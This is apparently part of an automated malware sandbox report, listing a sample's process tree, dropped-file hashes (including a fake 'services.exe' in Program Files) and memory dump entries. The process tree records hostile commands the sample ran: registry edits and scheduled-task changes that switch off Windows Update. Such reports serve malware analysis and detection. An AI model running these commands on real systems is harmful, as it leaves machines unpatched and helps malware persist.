- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "jgimrcmwq"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\services.exeFilesize
5.3MB
MD552fdd7f3ed1b50bc5794983a37cb4064
SHA14a185751e9e94dccb3330ca79f893de7ca080482
SHA256e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
SHA5124f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f
-
C:\Program Files\Windows\services.exeFilesize
5.3MB
MD552fdd7f3ed1b50bc5794983a37cb4064
SHA14a185751e9e94dccb3330ca79f893de7ca080482
SHA256e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
SHA5124f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD584f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
memory/160-178-0x0000000000000000-mapping.dmp
-
memory/308-177-0x0000000000000000-mapping.dmp
-
memory/420-365-0x0000000000000000-mapping.dmp
-
memory/420-173-0x0000000000000000-mapping.dmp
-
memory/492-172-0x0000000000000000-mapping.dmp
-
memory/500-221-0x0000000000000000-mapping.dmp
-
memory/500-364-0x0000000000000000-mapping.dmp
-
memory/540-169-0x0000000000000000-mapping.dmp
-
memory/540-219-0x0000000000000000-mapping.dmp
-
memory/540-361-0x0000000000000000-mapping.dmp
-
memory/752-386-0x0000000000000000-mapping.dmp
-
memory/860-359-0x0000000000000000-mapping.dmp
-
memory/940-366-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/940-367-0x0000000000401BEA-mapping.dmp
-
memory/940-372-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/1144-168-0x0000000000000000-mapping.dmp
-
memory/1172-175-0x0000000000000000-mapping.dmp
-
memory/1212-185-0x0000000000000000-mapping.dmp
-
memory/1212-387-0x0000000000000000-mapping.dmp
-
memory/1280-180-0x0000000000000000-mapping.dmp
-
memory/1524-381-0x0000000000000000-mapping.dmp
-
memory/1580-200-0x0000000000000000-mapping.dmp
-
memory/1604-188-0x0000000000400000-0x0000000000C91000-memory.dmpFilesize
8.6MB
-
memory/1780-117-0x0000000000400000-0x0000000000C91000-memory.dmpFilesize
8.6MB
-
memory/1852-124-0x00000273F98A0000-0x00000273F9A7C000-memory.dmpFilesize
1.9MB
-
memory/1852-123-0x00000273F6D70000-0x00000273F6F4D000-memory.dmpFilesize
1.9MB
-
memory/2116-395-0x000002336A5D0000-0x000002336A5D6000-memory.dmpFilesize
24KB
-
memory/2116-397-0x0000023369EA0000-0x0000023369EA7000-memory.dmpFilesize
28KB
-
memory/2120-368-0x0000000000000000-mapping.dmp
-
memory/2120-174-0x0000000000000000-mapping.dmp
-
memory/2128-380-0x0000000000000000-mapping.dmp
-
memory/2180-214-0x0000000000000000-mapping.dmp
-
memory/2180-357-0x0000000000000000-mapping.dmp
-
memory/2196-379-0x0000000000000000-mapping.dmp
-
memory/2212-170-0x0000000000000000-mapping.dmp
-
memory/2268-179-0x0000000000000000-mapping.dmp
-
memory/2288-374-0x0000000000000000-mapping.dmp
-
memory/2372-233-0x0000016678970000-0x0000016678A29000-memory.dmpFilesize
740KB
-
memory/2372-227-0x0000016678790000-0x00000166787AC000-memory.dmpFilesize
112KB
-
memory/2372-266-0x0000016678780000-0x000001667878A000-memory.dmpFilesize
40KB
-
memory/2372-201-0x0000000000000000-mapping.dmp
-
memory/2396-377-0x0000000000000000-mapping.dmp
-
memory/2404-212-0x0000000000000000-mapping.dmp
-
memory/2600-385-0x0000000000000000-mapping.dmp
-
memory/2608-383-0x0000000000000000-mapping.dmp
-
memory/2640-218-0x0000000000000000-mapping.dmp
-
memory/2640-360-0x0000000000000000-mapping.dmp
-
memory/2900-181-0x0000000000000000-mapping.dmp
-
memory/2948-183-0x0000000000000000-mapping.dmp
-
memory/2964-388-0x0000000000000000-mapping.dmp
-
memory/3036-358-0x0000000000000000-mapping.dmp
-
memory/3160-171-0x0000000000000000-mapping.dmp
-
memory/3160-362-0x0000000000000000-mapping.dmp
-
memory/3412-389-0x0000000000000000-mapping.dmp
-
memory/3472-373-0x0000000000000000-mapping.dmp
-
memory/3472-176-0x0000000000000000-mapping.dmp
-
memory/3644-382-0x0000000000000000-mapping.dmp
-
memory/3656-215-0x0000000000000000-mapping.dmp
-
memory/3660-213-0x0000000000000000-mapping.dmp
-
memory/3684-217-0x0000000000000000-mapping.dmp
-
memory/3708-375-0x0000000000000000-mapping.dmp
-
memory/3720-182-0x0000000000000000-mapping.dmp
-
memory/3752-222-0x0000000000000000-mapping.dmp
-
memory/3788-384-0x0000000000000000-mapping.dmp
-
memory/3836-376-0x000002C0CA910000-0x000002C0CA922000-memory.dmpFilesize
72KB
-
memory/3836-363-0x000002C0CA5C0000-0x000002C0CA5C6000-memory.dmpFilesize
24KB
-
memory/3864-220-0x0000000000000000-mapping.dmp
-
memory/3880-216-0x0000000000000000-mapping.dmp
-
memory/3944-132-0x0000000000000000-mapping.dmp
-
memory/3944-137-0x000001BD6A0B0000-0x000001BD6A0D2000-memory.dmpFilesize
136KB
-
memory/3944-140-0x000001BD6A260000-0x000001BD6A2D6000-memory.dmpFilesize
472KB
-
memory/4012-131-0x0000000000000000-mapping.dmp